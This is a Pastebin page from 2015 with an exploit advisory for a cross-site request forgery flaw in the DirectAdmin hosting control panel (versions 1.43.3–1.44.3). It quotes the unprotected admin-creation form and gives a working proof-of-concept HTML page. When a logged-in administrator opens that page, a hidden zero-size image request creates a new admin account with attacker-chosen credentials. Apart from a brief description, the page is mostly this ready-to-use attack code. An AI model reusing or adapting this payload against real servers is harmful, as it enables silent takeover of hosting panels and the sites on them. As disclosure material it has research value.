API tools faq
paste
Advertisement
moften

DirectAdmin (1.44.3) CSRF Vulnerability

moften
Oct 13th, 2015
248
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.94 KB | None | 0 0
raw download clone embed print report
  1. # Title : DirectAdmin (1.44.3) CSRF Vulnerability
  2. # Date : 10-10-2015
  3. # Version : 1.43.3-1.44.3
  4. # Author : @babayarisi http://ha.cker.io
  5. # Vendor : http://www.directadmin.com/
  6. # Download: http://www.directadmin.com/demo.html
  7. =============================================================================
  8. # info : DirectAdmin is a web-based hosting control panel.
  9.  
  10. #As you can see original form doesn't include csrf protection or any secret token.
  11. <form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" onSubmit="return formOK()">
  12. <input type=hidden name=action value=create>
  13. <tr><td class="list">Username:</td><td class="list"><input type=text name=username maxlength=12 onChange="checkName()"></td></tr>
  14. <tr><td class="list">E-Mail:</td><td class="list"><input type=text name=email onChange="checkEmail()"></td></tr>
  15. <tr><td class="list">Enter Password:</td><td class="list"><input type=password name=passwd> <input type=button value="Random" onClick="randomPass()"></td></tr>
  16. <tr><td class="list">Re-Enter Password:</td><td class="list"><input type=password name=passwd2 onChange="checkPass()"></td></tr>
  17. <tr><td class="list">Send Email Notification:</td><td class="list"><input type=checkbox value="yes" name=notify checked> <a href="javascript:showAdminMessage();">Edit Admin Message</a></td></tr>
  18.  
  19. <tr><td td class="listtitle" colspan=3 align=right>
  20. <input type=submit value="Submit">
  21. </td></tr>
  22. </form>
  23.  
  24. #POC
  25. <html>
  26. <head>
  27. <title>POC</title>
  28. </head>
  29. <script language="javascript">
  30.  
  31. function yurudi(){
  32. var adress ="www.demo.com";
  33. var username="demo";
  34. var email ="demo@demo.com";
  35. var password="12345";
  36. var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;
  37.  
  38. document.getElementById("resim").src=urlson;
  39. }
  40. </script>
  41.  
  42. <body onload="yurudi()">
  43. <img id="resim" src="" style="height:0px;width:0px;"></img>
  44. </body>
  45. </html>
  46. #POC
  47.  
  48. # don't be evil!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!